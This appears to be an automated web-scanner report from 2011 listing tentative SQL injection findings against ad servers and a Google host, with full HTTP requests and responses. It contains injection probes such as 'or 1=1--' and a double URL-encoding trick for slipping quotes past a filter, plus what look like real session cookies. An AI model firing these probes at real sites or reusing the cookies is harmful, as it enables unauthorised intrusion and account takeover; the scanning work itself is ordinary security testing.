Date: Sat, 17 Sep 2011 01:50:39 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.18 NY-AD8
Set-cookie: C=omI9X9wB2HY7chaeb4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:58 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 167371135/1241135538/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


1.19. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /safebrowsing'/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc HTTP/1.1
Host: safebrowsing-cache.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH
Pragma: no-cache
Cache-Control: no-cache

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 11:41:22 GMT
Server: sffe
Content-Length: 11872
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...

Request 2

GET /safebrowsing''/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc HTTP/1.1
Host: safebrowsing-cache.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH
Pragma: no-cache
Cache-Control: no-cache

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.google.com/sorry/?continue=http://safebrowsing-cache.google.com/safebrowsing%27%27/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc
Content-Length: 357
Date: Sat, 17 Sep 2011 11:41:28 GMT
Server: GFE/2.0

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/sorry/?con
...[SNIP]...

1.20. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ktextColor parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The ktextColor parameter appears to be vulnerable to SQL injection attacks. The payloads 21208523%20or%201%3d1--%20 and 21208523%20or%201%3d2--%20 were each submitted in the ktextColor parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=00000021208523%20or%201%3d1--%20&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A3%3A41&ranreq=0.31895528361201286&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71897565&rk1=2053665&rk2=1316239421.077&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:22:06 GMT
Content-Length: 1477
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:22:06 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA/WgAAAAAAAAAAAAAAAAAAAAAAAAAAAABBgAAAGgMAANgCAABaAAAABwAAAAEAAAABAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=></div>');
document.writeln('<SCRIPT>');
document.writeln('document.write("<scr"+"ipt src=\'http://afe.specificclick.net?l=1966491151&sz=728x90&wr=j&t=j&u="+escape(document.location)+"&r="+escape(document.referrer)+"\'></scri"+"pt>");');
document.writeln('</SCRIPT>');
document.writeln('<NOSCRIPT>');
document.writeln('<A HREF="[default_href]"> <IMG SRC="[default_img_src]" WIDTH=728 HEIGHT=90 border=0 ALT="Click Here!"></IMG></A>');
document.writeln('</NOSCRIPT>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?operId=1&pubId=27330&siteId=27331&adId=23103&adServerId=794&kefact=0.500000&kpbmtpfact=0.000000&kadNetFrequecy=0&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1316222526&indirectAdId=32833&adServerOptimizerId=1&ranreq=0.31895528361201286&defaultReq=1&defaultedAdServerId=1053&kadDefNetFreq=0&imprCap=1&pageURL=http://ad.afy11.net/ad"> </iframe>');

Request 2

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=00000021208523%20or%201%3d2--%20&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A3%3A41&ranreq=0.31895528361201286&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71897565&rk1=2053665&rk2=1316239421.077&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:22:07 GMT
Content-Length: 1828
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:22:06 GMT; path=/
Set-Cookie: _curtime=1316222527; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:32:07 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAACAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=46AD5D33-3A03-4DF5-99B7-CA6C61AD8658&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D71897565%26rk1%3D2053665%26rk2%3D1316239421.077%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>\');<'+'/script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?operId=1&pubId=27330&siteId=27331&adId=23103&adServerId=243&kefact=0.500000&kpbmtpfact=0.741500&kadNetFrequecy=0&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1316222527&indirectAdId=0&adServerOptimizerId=2&ranreq=0.31895528361201286&defaultReq=1&defaultedAdServerId=1053&kadDefNetFreq=0&campaignId=1336&creativeId=0&pctr=0.000000&imprCap=1&pageURL=http://ad.afy11.net/ad"> </iframe>');

1.21. http://tag.contextweb.com/TagPublish/GetAd.aspx [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:49:38 GMT
Content-Length: 2565
Connection: close
Set-Cookie: vf=1100; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app207_5vjkeBW8txQp%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP201
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:49:39 GMT
Content-Length: 2264
Connection: close
Set-Cookie: 539292_4_107784_-1=1316224179419; Domain=.contextweb.com; Path=/
Set-Cookie: vf=1101; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20%
...[SNIP]...

1.22. http://tag.contextweb.com/TagPublish/GetAd.aspx [ca parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ca request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD%2527&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2565
Date: Sat, 17 Sep 2011 01:46:43 GMT
Connection: close
Set-Cookie: vf=787; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app204_cfDJ2QoPglRh%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD%2527%2527&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2264
Date: Sat, 17 Sep 2011 01:46:45 GMT
Connection: close
Set-Cookie: 539292_4_107784_-1=1316224004962; Domain=.contextweb.com; Path=/
Set-Cookie: vf=788; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20%
...[SNIP]...

1.23. http://tag.contextweb.com/TagPublish/GetAd.aspx [cwu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The cwu parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cwu parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the cwu request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212%2527&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
